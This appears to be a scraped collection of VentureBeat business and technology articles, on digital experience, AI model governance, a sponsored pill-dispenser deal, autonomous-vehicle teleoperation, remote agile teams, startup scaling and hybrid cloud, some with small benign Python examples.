"https://venturebeat.com/2022/01/15/how-digital-experiences-are-fueling-the-new-digital-economy"
"How digital experiences are fueling the new digital economy This article was contributed by Ken Fine, CEO of Heap. The reign of the digital economy is upon us. It’s become increasingly difficult to differentiate between the digital economy, the physical economy, and service economies since digital technology and the internet now mediate so many transactions across every industry. By now, even the traditional barbershop has realized that offering a great digital experience is the key to business survival. “The digital economy” and “the economy” may not yet be synonymous, but that gap is quickly closing. A recent analysis predicted that digital and digital-transformed businesses would account for $53.3 trillion, roughly half of global gross domestic product, by 2023.
And, because these projections don’t account for free goods and services in the digital economy, some economists believe that the given estimates are likely too conservative. New expectations are the new normal In 2011, venture capitalist Marc Andreessen observed that “software is eating the world.” Ten years later, the coronavirus pandemic has only made tech hungrier. The emblematic experience is now digital, unfolding on the screens of our computers, tablets, and phones. In the first lockdowns, people who might never have ordered groceries began using mobile apps like DoorDash; Zoom, an obscure teleconferencing system, became as familiar as Google and Facebook. With emergency rooms overfull and hospital staff overextended, many routine medical interactions migrated to telehealth, which McKinsey predicts could be a quarter-trillion-dollar business. For businesses in the digital economy, the biggest byproduct of moving everything on-screen and online was that consumers increasingly expect their needs to be met through digital experiences. The average consumer has now internalized Amazon-style one-click convenience as their baseline. Disappoint them and they’ll take their business elsewhere, “walking” to the next business with a few screen taps or keystrokes. A sticking point that slowed down a transaction yesterday is likely to cancel that transaction today. When a check can’t be deposited via a credit union’s phone app, when a local restaurant’s website doesn’t load, when a digital storefront is not integrated with familiar payment processors — customers simply leave. And odds are they won’t return to give the platform a second chance. The three I’s in a digital economy How will businesses compete in this increasingly digital environment? Just as they have always done: serving the needs of their customers.
What’s changed is that being a leader today means setting the bar for the digital experience, and then raising it, again and again. The best companies will do this by adhering to the three i’s: information, insight, and iteration. Armed with a wealth of data and a powerful set of new tools, the next generation of industry leaders will be those who focus on continuously improving the digital experience they provide their customers. With frequent releases and updates, they’ll keep setting — and then exceeding — new standards of accessibility and ease of use. Information Digital businesses produce terabytes’ worth of information every day, but relatively few businesses capture all the data their customers produce. This is leaving money on the table in a digital economy. How long does the average potential customer spend on the website or in the app? Where do customers exit the sales funnel? What age groups don’t react to your sales pitches, and in which cities do your biggest fans reside? This information is the foundation of best-of-breed digital experiences. Insight Data tells stories that people alone cannot decipher. While broad trends may be obvious even to a statistical amateur, best-in-class insight draws on the subtle, the hidden, and the counterintuitive. A portion of your website that seems intuitive and friendly to your design team might in reality be a point of consumer friction; another page might send unduly high numbers of customers to their browsers’ “back” buttons. Assumptions and gut feelings about customer experience may not reflect reality, and even when they’re broadly correct, specifics are more useful than generalities. Iteration All the insight in the world is useless unless it’s put into practice. In a time of rapid and disconcerting change, businesses cannot rest on past accomplishments: They must continuously reintroduce and refine their offerings. A/B testing, revised sales funnels, and tweaked landing pages all have parts to play.
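The A/B testing mentioned above ultimately comes down to a significance check on conversion rates. A minimal sketch of the standard pooled two-proportion z-test (the visitor and conversion counts are made up for illustration):

```python
from math import sqrt

def ab_z_score(conv_a, n_a, conv_b, n_b):
    """Pooled two-proportion z-score for an A/B conversion test.

    |z| > 1.96 corresponds to the usual 5% two-sided significance bar.
    """
    p_a, p_b = conv_a / n_a, conv_b / n_b
    pooled = (conv_a + conv_b) / (n_a + n_b)
    se = sqrt(pooled * (1 - pooled) * (1 / n_a + 1 / n_b))
    return (p_b - p_a) / se

# Variant B converts at 5.8% vs. 5.0% for A, with 10,000 visitors each.
z = ab_z_score(500, 10_000, 580, 10_000)
print(round(z, 2), "ship it" if abs(z) > 1.96 else "keep testing")
```

The discipline matters more than the math: without a threshold agreed in advance, "iteration" degenerates into chasing noise.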
The most successful of today’s major digital economy players, like Amazon, Netflix, and Google, are constantly tweaking their websites and updating their apps in hopes of producing “stickier” and more convenient experiences. The information-insight-iteration cycle should only end when the business does: Each new product iteration that goes online provides further information for the business to distill into insight. This knowledge gets quickly incorporated into the next release. The customer gets a better and more satisfying experience; the company increases revenue and lifetime value. As the OECD reported, the economy now faces “COVID-19 induced digital acceleration.” The digital economy of 2023, when digital business is set to account for half of GDP, will doubtless hold many surprises for even the best-informed prognosticator. Businesses cannot expect that their December 2021 offerings will suffice for January 2022, much less January 2023. As we enter a new era of digital competition, the would-be winners of tomorrow must continue to gather the data that they need to innovate and to iterate. Customers demand better digital experiences. Businesses that fail to adapt should plan for obsolescence. Ken Fine is the CEO of Heap.
"
15,074
2,022
"How to identify the right AI model governance solution for your business | VentureBeat"
"https://venturebeat.com/2022/02/01/how-to-identify-the-right-ai-model-governance-solution-for-your-business"
"How to identify the right AI model governance solution for your business This article was contributed by Harish Doddi, CEO of Datatron. The pandemic has wreaked havoc on the carefully developed AI models many organizations had in place. With so many different variables shifting at the same time, what we’ve seen in many companies is that their models became unreliable or useless. Having good documentation showing the lifecycle of a model is important, but that still doesn’t provide enough information to go on once a model becomes unreliable. What’s needed is improved AI model governance, which can help bring greater accountability and traceability for AI/ML models by having practitioners address questions such as: Which input variables are entering the model? What are the output variables? How does the model behave in terms of certain metrics? What were earlier versions like?
Who has access to it? Has any unauthorized person gained access to it? How exactly does AI model governance help tackle these issues? And how can you ensure you’re using it to best fit your needs? Read on. Too much manual effort Data scientists use a variety of tools to develop their models, whether it’s SAS, R, Python, or the multitude of machine learning software libraries available today. With machine learning still in its nascency, there are a ton of options to choose from. Some use cases are simply more effective with certain languages or frameworks, for example, and data scientists tend to be relatively loyal to one language over another. Since this field is so specialized and data scientists are so few, their work is siloed from the rest of the enterprise. This makes it difficult for the primary IT or oversight body to guarantee appropriate company-wide governance and audit of models. That means this body will need to exert major manual effort to go to all the various departments and gather the needed model governance information. They can overcome this issue by implementing an AI governance solution. Evaluating AI governance solutions There are certain expectations, rules, and assumptions that ML models must abide by during the development process. When these models are deployed into production, they can yield quite different results from those in controlled development environments. Governance is critical here. Those involved in governance must have a means of tracking the different models and the different versions associated with the models. For an AI governance solution to be effective, its catalog must have the ability to track and document the framework that the models are developed in.
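What such a catalog might record for each model version can be sketched as a simple data structure (the field names and teams are hypothetical, not any vendor's schema):

```python
from dataclasses import dataclass, field

@dataclass
class ModelCatalogEntry:
    """Minimal governance record for one model version.

    Captures the framework, lineage, and access details an auditor
    would ask for; every field here is an illustrative assumption.
    """
    name: str
    version: str
    framework: str              # e.g. "scikit-learn", "PyTorch", "R"
    input_features: list
    output_variables: list
    owner: str
    authorized_users: list = field(default_factory=list)

    def is_authorized(self, user: str) -> bool:
        """Only the owning team and explicitly listed users may access it."""
        return user == self.owner or user in self.authorized_users

entry = ModelCatalogEntry(
    name="credit-limit", version="2.3.1", framework="scikit-learn",
    input_features=["income", "utilization"], output_variables=["limit"],
    owner="risk-team", authorized_users=["audit-team"],
)
print(entry.is_authorized("marketing-team"))  # False
```

Even this toy record answers the questions posed earlier: which variables go in and come out, which framework was used, and who may touch the model.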
In addition, the catalog must have the ability to ensure model lineage, associating each model with the features it uses. Importantly, it must enable computation of the appropriate governance metrics for those features. In recent years, as more organizations have operationalized ML models, their dark side has emerged in the form of biases and other issues. An example would be a financial institution whose models recommend offering lower credit limits to women compared to men living in the same home. It’s necessary to have the ability to compute and track metrics that might affect these models, such as anomalies, risks, levels of performance, biases, and data drifts. It’s not possible to simply calculate them in a lab; calculations must be done when the models are in production. You’ll need a dashboard that can display these metrics to your data scientists and your business users. The metrics need to be displayed in such a way as to alert business users to potential issues. And your data scientists need to see the metrics that will guide them to those possible issues. You’ll also need a feature that enables you to identify potential anomalies based on the business-specific thresholds you set — and to notify both parties if something’s off without overwhelming them with false alarms. ML models need secure access Particularly in larger organizations, model security is crucial. Serious problems could occur should a model accidentally get exposed to the wrong department. For instance, imagine that ML models have been successfully optimized to increase revenue by a few points. Now imagine that another department incorrectly uses those models. That could expose the company to fines equaling millions of dollars for regulatory violations. It’s possible to tweak and reverse-engineer models, but if you don’t understand their original context, your organization could be at risk from subsequent iterations of those models. 
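As a concrete illustration of the threshold-based metric alerting described above, here is a minimal sketch. It is hypothetical, not any particular governance product’s API; the drift measure, metric names, and threshold values are all invented for the example:

```python
import statistics

def drift_score(training_values, production_values):
    """Crude drift signal: shift of the production mean away from the
    training mean, measured in training standard deviations."""
    mu = statistics.mean(training_values)
    sigma = statistics.stdev(training_values)
    return abs(statistics.mean(production_values) - mu) / sigma

def check_metrics(metrics, thresholds):
    """Return only the metrics whose value crosses its business-set
    threshold; metrics without a configured threshold never alert."""
    return {name: value for name, value in metrics.items()
            if value > thresholds.get(name, float("inf"))}

# Example: an income feature has shifted upward in production.
train = [50, 52, 48, 51, 49, 50, 53, 47]
prod = [60, 62, 58, 61, 59, 63, 60, 57]
metrics = {"income_drift": drift_score(train, prod)}
alerts = check_metrics(metrics, {"income_drift": 2.0})
```

The point of the threshold lookup with a default of infinity is the false-alarm concern mentioned above: only metrics the business has explicitly configured can ever page anyone.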
In this case, the tweaked models aren’t doing what they’re documented to be doing. Model governance has left the building. It’s important to require permission to access sensitive models that shouldn’t be shared with other departments. To make certain that no unauthorized parties — including applications — can get access to your model, you need encryption and an audit trail. You have to set up a method that guarantees traceability, transparency, and accountability. Standardization is key It’s obvious that a model governance solution offers many benefits, but implementation can be a challenge. Speed, cost, and effectiveness are likely to suffer from the complex review flows of AI model governance. Consistency is a big problem. Your governance solution must be applicable across all models, not just to certain business departments. Not all solutions offer standardization, so add that item to your list when vetting them. Making your models successful Some organizations have had to scramble as the pandemic weakened or destroyed their AI and ML models. This also highlighted the need for model governance to improve accountability and traceability for machine learning models. A model governance solution, properly vetted, will reduce risks and increase the likelihood of successful models that will serve business goals. Harish Doddi is the CEO of Datatron. DataDecisionMakers Welcome to the VentureBeat community! DataDecisionMakers is where experts, including the technical people doing data work, can share data-related insights and innovation. If you want to read about cutting-edge ideas and up-to-date information, best practices, and the future of data and data tech, join us at DataDecisionMakers. You might even consider contributing an article of your own! 
"
15,075
2,021
"IoT devices and apps are changing med management for the better | VentureBeat"
"https://venturebeat.com/2021/07/30/iot-devices-and-apps-are-changing-med-management-for-the-better"
"Sponsored Deals IoT devices and apps are changing med management for the better If you’ve ever felt like every doctor’s appointment ends with a new prescription, you’re probably a little overwhelmed by trying to keep your medications straight. Which ones are okay to take at night and which ones have to be taken with breakfast? Did you order a refill for that medication that’s about to run out? And did you even take those pills this morning like you were supposed to? If only there was a way for something else to keep track of your regimen and make sure you’re staying on schedule. Fortunately, technology is integrating with healthcare at an impressive rate, and patients are hopeful for more at-home tools to help them manage their medical conditions. Enter Hero: the new way to manage your meds. 
Their service includes the only app-integrated automatic pill dispenser that sorts and dispenses your medications according to your prescribed schedule, sends you dosage reminders via phone notifications, and orders refills for you and delivers them directly to your door. Getting started with the app on your device is simple. Whether you have iOS or Android, download the app and enter your medication information into your account. Then, add up to 90 days’ worth of 10 different medications into the connected pill dispenser. When synced with the app, the pill holder sorts and distributes the right medications at the right time. With just a push of the button, you’ll have your meds conveniently dispensed when you need them. But Hero is about more than just convenience. When you’re dealing with polypharmacy treatment plans, keeping track of medications can be the difference between staying healthy and winding up in the hospital. The steeper costs of healthcare associated with medication adherence issues can include the costs of urgent care and hospital stays, as well as in-home medication management help. Fortunately, lessening the burden of these costs can come directly from better medication management. Becoming a Hero member grants you access to the dispenser, connected app, and their prescription refill and delivery service. Hero is also FSA/HSA eligible, bringing some more savings to your wallet. Plus, you can currently save $50 off your initiation fee so you can get started with better medication management as soon as possible. “VentureBeat Deals is a partnership between VentureBeat and StackCommerce. This post does not constitute editorial endorsement. If you have any questions about the products you see here or previous purchases, please contact StackCommerce support here. Prices subject to change.” VentureBeat's mission is to be a digital town square for technical decision-makers to gain knowledge about transformative enterprise technology and transact. 
Discover our Briefings. "
15,076
2,021
"13 challenges that come with autonomous vehicles | VentureBeat"
"https://venturebeat.com/2021/11/25/13-challenges-that-come-with-autonomous-vehicles"
"13 challenges that come with autonomous vehicles Teleoperation: the technology that enables a human to remotely monitor, assist and even drive an autonomous vehicle. Teleoperation is a seemingly simple capability, yet it involves numerous technologies and systems in order to be implemented safely. In the first article of this series, we established what teleoperation is and why it is critical for the future of autonomous vehicles (AVs). In the second article, we showed the legislative traction and emphasis gained for this technology. In the third and fourth articles, we explained two of the many technical challenges that needed to be overcome in order to enable remote vehicle assistance and operation. The fifth article explained how this is all achieved in the safest possible way. In this installment, we will get to the most important person in the entire loop, the customer. 
There is an Israeli journalist, Sarah Tuttle-Singer, who writes the stories she hears from taxi drivers. She has so many that she even wrote a book with the best of them. This makes perfect sense. Cabbies spend all day riding around with different passengers, and when people are bored, they talk. Invariably, taxi drivers have a million anecdotes to share. Unfortunately, with the oncoming transition to autonomy, these stories will go away. The problem with autonomous vehicles There is an existential issue with removing a driver from the vehicle. You simply cannot provide 100% service availability nor a satisfactory level of customer experience, not today and not in 50 years. Human interaction is mission-critical. There are many cases where an autonomous system is incapable of responding to the level that the customer desires and is entitled to. The lack of a human behind the wheel not only means that there will be vehicle downtime due to being confused by different situations but that seemingly simple services cannot be delivered. The reason is simple: a machine does not know how to interact with a human the same way that a human does. The customer experience is possibly the biggest issue of them all when it comes to autonomy, and the issues fall into four main categories: passenger concerns, emergencies, deliveries, and attended zones. Passenger concerns 1. Passenger discomfort: Maybe they feel anxious or unsafe. With no human driver to respond to their needs, the passenger has no one to communicate with; no one to assuage their fears, reassure them, or address the source of the problem. 2. Controlling the A/C or infotainment system: Not every passenger has the same comfort levels or needs, and not everyone knows how to operate certain systems. 
Issues with temperature control or onboard entertainment are inevitable. Yet there is no one to talk to. 3. Particular drop-off points: Currently, when you arrive near your destination you simply say, “can you drop me off by that door/car/tree/etc?” and typically the driver will do just that. With a self-driving system, not only will it not be able to do that, but it might bring you to what is technically the right address yet not an ideal spot for easy access. This is especially important for older passengers and people going for medical treatments. 4. Passenger infractions: Not all issues stem from the vehicle. What if the passenger is not wearing a seatbelt, or there are too many people crowding the back seat? A human driver would set them straight, and the problem would be solved. Would a robot taxi even be able to recognize these issues, let alone handle them? 5. Forgotten items or, worse, a forgotten baby: In 1999, world-famous cellist Yo-Yo Ma forgot his $2.5M cello in a taxi. Passengers have even forgotten sleeping children. Right now it’s easy to call the driver (whose number is on the receipt). This is no longer an option when there is no driver who can pull over and check the vehicle for people or possessions. 6. Vandalism: Unfortunately not all people are good. In fact, some are rather bad, while others such as teenagers are simply careless and indifferent. Passengers can damage or ruin a vehicle during a ride. Without the watchful eyes of a driver, this behavior would go unchecked. The result is higher maintenance costs, reduced profits, and downtime for the vehicle. Emergencies 7. Law enforcement: When a vehicle is driving erratically or there is a matter that needs investigation, police use a speaker to alert the driver to pull over. With no driver on board, the police are unable to do their job, and the consequences can be unfortunate. 
8. Medical/Ambulances: Similar situation to the police. Perhaps a passenger is having a medical issue and manages to make a 911 call. The vehicle still needs to know where and when to stop to let the medical professionals give passengers the treatment they need. Deliveries 9. Wrong/damaged/missing package: When you receive a package from a courier they hand it to you and ask you to sign for it. If the package received is badly damaged, or simply the wrong thing, you can tell them and they handle it. If you are missing an item, they will go back and bring what they forgot. A robot would simply move on to its next destination automatically. 10. Finding the right customer: Today there are only a few vendors with delivery bots. However, these numbers will multiply as the technology improves and production costs drop. Soon there will be many robots with many recipients. A delivery bot might find itself making a drop-off to a location where multiple people are waiting for different orders. To the computer, it is impossible to ascertain to which human it needs to make its delivery. This may result in a confused device and a frustrated customer. Attended zones 11. Content validation: When a truck arrives for a pickup or drop off there is a need for the gate attendant to confirm the records, the contents of the delivery, and to direct the vehicle to its specific parking slot or loading dock. An autonomous system does not respond well to pointing in a direction or verbal commands, nor can it explain why there might be a discrepancy between the information it has and the instructions given by the attendant. 12. Changing orders: Once inside a facility, there may be someone who needs to redirect a vehicle from one task to another. This is especially true with construction zones where one vehicle might have a number of tasks and their order changes. 
There is no way for that person in the field to communicate these changing needs. 13. Damages : Once the vehicle has arrived there will be some level of vehicle inspection. If there is something wrong with the vehicle or damage has been incurred there is no one to tell. The solution For those who read the previous articles in this series, the answer should be obvious. For those who did not, the solution is to have a remote human in the loop. Currently, none of the aforementioned issues is a problem as there are human drivers and couriers. Autonomy cannot resolve these problems. A human being will still be needed to manage these issues in the most effective, efficient, and safe way possible. This is why teleoperation is the only choice. However, as with most solutions, it has its own challenges. Bringing a human into the loop When a teleoperation session is triggered it does not simply go to the first available teleoperator (TO). This is for the same reason that when you call customer service there is a routing system that, based on your input, will route you to the agent with the expertise you need. However, unlike a regular call center, the customer does not necessarily have the option to “press three for traffic issues” or “press pound to repeat this message”. The first possible solution would be for there to be a teleoperation manager (TM) who will answer the calls for assistance first and, upon ascertaining the level of complication and need, route the session to a specific operator. This would be highly inefficient and would mean the TM is not available to do their actual job — managing. Instead, there needs to be an automatic and intelligent way to route the need for human intervention without… human intervention. When a teleoperation session is triggered the first thing that is automatically ascertained is the source of the request. Did the passenger trigger the need for a TO? Was it a first responder or law enforcement? Or was it the vehicle itself? 
Each of these situations calls for a different type of response and therefore a different type of TO. Within a given teleoperation team there will be some who are junior and some who are senior, some who are more customer-oriented, and others who are more technical. A senior TO might be authorized for remote assistance and remote driving while their junior counterpart is only allowed to assist. Some TOs might be primarily for customer interaction situations, so if the session is triggered by the customer they will be the ones looped in. On the other hand, if the vehicle triggers the session, not because of a confusing traffic situation but because of a technical issue, an entirely different response would be needed. Remote assistance is complex We just established that the seemingly simple aspect of who answers which call is complicated. For the challenges in even establishing that connection, refer to our previous articles about network connectivity and video compression. There is still another challenge. Once the teleoperation session is started, the TO has to understand what exactly is going on. There is a serious amount of information they need to receive that must be layered into their display so they can better understand the situation. This issue multiplies when hopping between numerous vehicles. There have to be processes and tools built in so that there is minimal delay between the start of a session and the resolution of the problem for the vehicle, to the customer’s satisfaction. Enabling autonomy If autonomous vehicle providers ever want to have mass-deployed robot fleets, they must ensure the human is in the loop. It is a complicated and complex process from beginning to end and a completely different technology from the autonomy itself. This is why teleoperation vendors exist and why industry leaders like Motional choose to rely on them for this mission-critical function. 
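The routing logic described above can be sketched as a simple capability match. This is a hypothetical illustration; the trigger names, operator attributes, and escalation behavior are assumptions for the example, not an actual teleoperation system’s API:

```python
from dataclasses import dataclass
from typing import Optional

@dataclass
class Teleoperator:
    name: str
    senior: bool           # seniors may remote-drive; juniors assist only
    customer_facing: bool  # trained for passenger-triggered sessions
    busy: bool = False

def route_session(trigger: str, team: list) -> Optional[Teleoperator]:
    """Route a session to the first free operator matching the trigger source."""
    def matches(op: Teleoperator) -> bool:
        if trigger in ("passenger", "first_responder"):
            return op.customer_facing   # customer-interaction specialist
        if trigger == "vehicle":
            return op.senior            # remote driving may be required
        return False
    for op in team:
        if not op.busy and matches(op):
            op.busy = True
            return op
    return None  # no match: escalate to the teleoperation manager

team = [Teleoperator("junior", senior=False, customer_facing=True),
        Teleoperator("senior", senior=True, customer_facing=False)]
```

In this sketch, a passenger-triggered session goes to a free customer-facing operator, a vehicle-triggered one goes to a senior operator authorized to remote-drive, and anything unmatched falls through to the teleoperation manager, so the TM only sees exceptions.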
Anything else and they are not on the right track towards the self-driving future. "
15,077
2,021
"The agile team has gone home. Now what? | VentureBeat"
"https://venturebeat.com/2021/09/11/the-agile-team-has-gone-home-now-what"
"Guest The agile team has gone home. Now what? Agile may be synonymous with software development, but it is equally about people, because the purpose of agile sprints is to incorporate feedback at quick intervals to deliver what customers want. And the agile process itself works best with close collaboration between developer and stakeholder groups, also bringing together development and IT operations teams when used in conjunction with DevOps. So it is no surprise that there is a strong correlation between an enterprise’s growth and its agile capability: 6 of the top 7 agile levers by impact were people-related. (My team published some recent research on this.) A core principle of agile transformation is to use face-to-face interaction, which went right out the window when the pandemic hit. 
However, the use of agile has actually increased over the past year while almost everyone around the world was working remotely. Reconciling these seemingly opposite shifts makes for an interesting challenge for enterprises. But it is not an impossible one. Consider the following key agile levers, all impacting people dynamics: Workforce and workspace levers Using agile virtual workspaces along with digital collaboration platforms to support remote but collective and cohesive work has been a big driver of success. At my company, we conducted a study of our own employees right before and just into the pandemic, and it showed that when 3 or more early agile sprints were conducted on-premises with workers coming to the office, it paved the way for the asynchronous communication and remote work that followed. At the same time, using digitized visual Kanban dashboards along with other collaboration accelerators helped our remote teams make better decisions and operate as productively as they did when they were on-premises. Culture levers Autonomous and self-managed teams are able to focus better on value delivery, which improves customer experience and return on investment. Similarly, self-organized agile teams improve technology outcomes. A hybrid working model can complicate this, though. When agile development goes from on-premises to remote – especially without warning as it did last year – the teams risk losing visibility of the status of different projects, their business and technical contexts, and even the pathways of communication. We found from our experience that enabling early, incremental feedback to remote teams helped them stay on track or correct course on time when needed. This also coordinated the efforts of developers working on different parts of the same module and gave them a shared sense of purpose. 
Organization structure levers Several enterprises have adopted agile processes and techniques outside the IT function, in areas such as business operations, human resources, sales, and even legal. This sets the stage for effective collaboration across functional boundaries. As we look at our employees, we see that cross-functional collaboration can be made to work even in a remote or hybrid work situation. When we increased the proportion of cross-skills in our remote teams by 15% to 20%, they became as productive as they were in office. While this experiment was confined to the IT function, there is every reason to believe that the results would be similar even when cross-skills across functional lines are combined. The skills need not always be available in-house; enterprises can even tap the gig economy quite effectively. When it comes to applying agile principles to people in the hybrid work world, here are some questions to ponder: Do you have enough digital visualization processes to help remote workers catch up with their on-prem peers? Do you offer frequent, incremental, and early insights from feedback to remote working teams to help them stay tuned to the project’s vision? Through the iterative cycles of agile learning and working, are you creating virtual safe spaces where the team can learn from its mistakes and table requests in the absence of impromptu interactions? Too much collaboration can take away from productive individual work time. Is your work culture cognizant of this potential pitfall? Are your teams buoyed by “feel good” spikes from socio-emotional cues as they work in the hybrid mode? The bottom line For enterprises with entrenched agile principles and practices, switching to a hybrid working model requires significant adjustment. 
But with the right adaptation of practices and some changes around technology tools and platforms, functional skills, and organization structure and culture, agile teams can perform comparably to how they used to when they worked in the office. Alok Uniyal is VP & Head of the IT Process Consulting Practice at Infosys and specializes in helping organizations embrace new ways of working by leveraging lean, Agile, DevOps, and design thinking. He also spearheads the Agile and DevOps transformation within Infosys. ( Twitter ) "
15,078
2,022
"9 warning signs you aren’t ready to scale | VentureBeat"
"https://venturebeat.com/2022/03/27/9-warning-signs-you-arent-ready-to-scale"
"Guest 9 warning signs you aren’t ready to scale For months, your team has been working at a breakneck pace to build and refine your product idea, with feedback from early adopters. It’s going well, but it’s been so. Much. Work. The team is in a dual state of exhaustion and excitement. User retention is growing. You’ve built a product that you’re sure people will love. Investors are taking notice and conversations are heading toward funding for the next stage. Success is on the horizon. It’s so close you can feel it. If this sounds like you, then congratulations! You’ve overcome major hurdles to get to this point. For many, the moment you get that funding starts a new clock: new features, new hires, new users. The next stage of growth. But have you really thought about what will happen when you double or triple your team size to meet growth demands? 
Do you have the right team now to support this growth? The right infrastructure? The right culture? Can your company successfully scale? For early-stage startups, warning signs pop up along the way but are often ignored. We say things like “culture doesn’t drive acquisition,” “it’s not important today,” or “we’ll deal with it when we get there.” I’ve watched startups churn their way through the transition from early stage to growth stage. The ones that avoid long-term, critical missteps are the ones that start planning for their growth early and deliberately. They bet on their own success by prioritizing the work that will ensure the company is built to scale. If you’ve reached this important inflection point in the growth of your startup, pay attention to these warning signs that you may not be ready to scale: Your backlog is growing exponentially with technical debt. There is no easier way to tell that you will have long-term growth problems than a backlog of technical debt that you never seem to have time for. Technical debt is normal, expected maintenance for any product and shouldn’t be left on the back burner sprint after sprint. If you’re struggling with this problem, there are likely two causes (sometimes both): You haven’t prioritized a sustainable process for maintaining this debt, or your product is unstable. You can address this by talking to your team directly and getting their feedback on how they feel about technical debt. Is this a prioritization issue due to unrealistic deadlines for feature development? Give them the space to prioritize. Does the team feel the product infrastructure may be reaching its breaking point? Evaluate the pros and cons of a refactor versus a rewrite. During growth, your startup is slow to release features. 
If you’re slow to release features and improvements, you’ll frustrate teams and users alike. This is often a cultural problem of trying to solve too many things at once. If you haven’t already, you should follow best practices of continuous deployment, including breaking features down into small, valuable increments and getting things out to be tested as soon as possible. Fully embrace agile and iterative development now, not later.

Your data is untrustworthy.

Quantitative data isn’t very useful early on. Then, suddenly, your product has enough users to make data useful. There is nothing more frustrating than not having confidence in the accuracy and integrity of the data coming out of your platform. This is a common problem for startups that don’t prioritize a single source of truth for their data and end up with conflicting, messy information that makes decision-making nearly impossible. So, how can you avoid this? Invest early in a customer data platform (CDP) like Segment that helps you collect, clean, and activate your customer data. Trust me, you will thank me later.

You’re not staying focused on the measurements that actually matter.

Yes, data is important when you start to scale. But it can also provide an overwhelming amount of information that makes it difficult to derive meaningful insights. This mountain of data ends up bogging down decision-making and distracting from what truly matters. Be clear about what data to measure and at which stage of growth. For most growing startups, the most important metric for a successful product is retention. It’s the best measure to understand that you’ve built a product people find useful and will fall in love with. Other metrics are necessary to sell investors, but do not lose sight of the fact that you’re building a product for your users. Without them, you won’t have a product that scales.

You have more marketers than engineers.
A surefire way to know you’re focused on the wrong metrics is that you have more marketers than engineers. Acquisition – getting new users to try your product – is much easier than getting them to stay and love your product. Hiring too many marketers early may increase your visibility, but it won’t help retention if your product can’t support the needs of its core adopters. If you see this imbalance on your team, then consider reallocating your dollars into building a healthy product team that can consistently ship features and keep user retention high. Until your company reaches later stages of growth, make sure you have enough engineers that the team is comfortable before investing more in marketing.

You don’t have a formal product strategy.

Nobody wants to take the time to write a formal product strategy. I get it. It takes time, and it takes (sometimes frustrating levels of) collaboration. And the very nature of startups is that they pivot, making the work of creating a strategy feel pointless and futile at times. But I promise, it’s not. Smart product companies do this, even if they aren’t talking about it publicly. Have the diligence and fortitude during this growth transition to document your startup’s strategy and ensure your team understands it, can interrogate it, and can build from it.

Your product team isn’t working cross-functionally.

Many startup product organizations are structured around resource or financial scarcity. Because of this, they build a product culture that is either highly engineering-centric or highly design-centric. Product management tends to fall to the owner of the company, if it’s considered at all. In the early stages this can work. But as the company grows, so does the need for maturity in the product team’s makeup. To improve cross-functional collaboration, reorient your product team leadership to consist of a product manager, an engineering lead, and a design lead (aka “the trio”).
Each should collaborate equally on decisions so that technical needs, business needs, and user needs are all considered as the product and its processes grow in maturity.

You’re not writing things down.

If your processes, culture, and ways of working all live in the spirit of the small team you currently work with, scaling will be painful. This works when a team is small, since people understand norms through the very nature of how closely they work together. But when startup growth happens and departments naturally silo, this is impossible to maintain. Deliberate growth includes deliberate documentation of what matters to the company. Without it, cracks will form in the culture and become a much bigger problem down the road. “Just enough process” and “just enough documentation” are my two favorite mottos. Start writing down the most important things you want people to be accountable for: your values, processes, and strategies. Over time, encourage team members to do the same.

You don’t have a plan for your culture or organizational evolution.

Once investor dollars hit, a second stage of high-paced work begins: hiring up a team, sometimes to two or three times its current size. If you don’t do this with a plan in mind, it can end up costing you dearly in the long run. Culture can change drastically and cause conflicts between old and new employees. The team you currently have can feel alienated and frustrated by this growth. Leadership involvement needs to change to support a large company versus the small, tight-knit group it once was. You can either drive this culture intentionally or you can let it happen to you. Sit down with your current team and map out the future stage of the company. Talk about the culture. What do you want to keep? What do you want to change? How will roles change? Who will take on leadership roles as company ownership moves into more formal C-level leadership?
Address your people’s excitement, fears, and other emotions around this growth. Build a plan that everyone feels invested in.

When people talk about startups, they often focus more on the challenges early-stage startups face — building the MVP, achieving product-market fit, and securing investor funding. Understandable, right? Without passing this stage, there is no future, so there is good reason to stay focused on the here and now. But this tunnel vision can make the transition from seed to scale that much more painful and put even the greatest ideas at risk of failure. Data from the Small Business Administration shows that the failure rate of startups is around 90%, with 21.5% of startups failing in the first year, 30% in the second year, 50% in the fifth year, and 70% in their 10th year. Startups face a higher risk of failure as they grow. Don’t let short-sighted focus cause your team to lose sight of the long-term vision: a sustainable product and company that continues to thrive well beyond MVP.

Summer Lamson is the chief services officer at DockYard , a digital product consultancy focused on helping innovative companies scale through the nexus of technology and design.

DataDecisionMakers Welcome to the VentureBeat community! DataDecisionMakers is where experts, including the technical people doing data work, can share data-related insights and innovation. If you want to read about cutting-edge ideas and up-to-date information, best practices, and the future of data and data tech, join us at DataDecisionMakers. You might even consider contributing an article of your own! Read More From DataDecisionMakers The AI Impact Tour Join us for an evening full of networking and insights at VentureBeat's AI Impact Tour, coming to San Francisco, New York, and Los Angeles!
DataDecisionMakers Follow us on Facebook Follow us on X Follow us on LinkedIn Follow us on RSS Press Releases Contact Us Advertise Share a News Tip Contribute to DataDecisionMakers Careers Privacy Policy Terms of Service Do Not Sell My Personal Information © 2023 VentureBeat. All rights reserved. "
15,079
2,021
"New tools to make the hybrid cloud simpler and the cloud datacenter sustainable | VentureBeat"
"https://venturebeat.com/2021/12/07/new-tools-to-make-the-hybrid-cloud-simpler-and-the-cloud-datacenter-sustainable"
"Artificial Intelligence View All AI, ML and Deep Learning Auto ML Data Labelling Synthetic Data Conversational AI NLP Text-to-Speech Security View All Data Security and Privacy Network Security and Privacy Software Security Computer Hardware Security Cloud and Data Storage Security Data Infrastructure View All Data Science Data Management Data Storage and Cloud Big Data and Analytics Data Networks Automation View All Industrial Automation Business Process Automation Development Automation Robotic Process Automation Test Automation Enterprise Analytics View All Business Intelligence Disaster Recovery Business Continuity Statistical Analysis Predictive Analysis More Data Decision Makers Virtual Communication Team Collaboration UCaaS Virtual Reality Collaboration Virtual Employee Experience Programming & Development Product Development Application Development Test Management Development Languages New tools to make the hybrid cloud simpler and the cloud datacenter sustainable Share on Facebook Share on X Share on LinkedIn Are you ready to bring more awareness to your brand? Consider becoming a sponsor for The AI Impact Tour. Learn more about the opportunities here. Over the past two years, the COVID-19 pandemic made remote working a top priority for many organizations, which were forced to enable employees to work from home to maintain productivity. As a consequence, these organizations began to heavily invest in on-demand computing resources for remote employees. As 2021 draws to a close, a wave of companies such as Liqid , Equinix , and Aryaka are developing solutions to support organizations in hybrid cloud setups , so they can move beyond the limitations of traditional datacenter technologies in order to optimize throughput and performance. And today saw three announcements that suggest how these companies intend to help enterprises become more streamlined. 
